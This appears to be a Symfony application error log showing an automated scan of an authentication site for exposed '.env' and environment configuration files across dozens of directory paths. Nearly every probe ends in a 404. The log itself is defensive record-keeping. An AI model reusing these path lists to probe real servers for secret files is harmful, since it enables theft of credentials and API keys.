[2025-12-20 20:46:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.envs"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.envs\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:46:25] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env~"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env~\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:46:41] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?pp=enable&pp=env","method":"GET"} []
[2025-12-20 20:46:59] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?pp=env&pp=env","method":"GET"} []
[2025-12-20 20:47:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ADMIN/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ADMIN/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /API/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /API/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /APP/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /APP/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /BACK/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /BACK/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /BACKEND/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /BACKEND/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /BE/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /BE/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Be/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Be/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin-app/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin-app/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:47:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /admin/backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /admin/backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /administrator/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /administrator/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api-node/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api-node/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api2/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api2/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api3/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api3/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:48:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:28] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apps/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apps/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back-end/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back-end/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:43] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /back/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /back/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend-api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend-api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:49] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:52] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/admin/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/admin/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:49:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend/api/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend/api/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:13] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /be/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /be/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /beta/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /beta/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:34] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/env.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/env.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/environment.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/environment.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:50:57] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/environment.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/environment.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /crm/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /crm/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:10] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /cron/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /cron/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:14] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /current/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /current/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:18] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /demo/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /demo/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-20 20:51:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dev/.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dev/.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
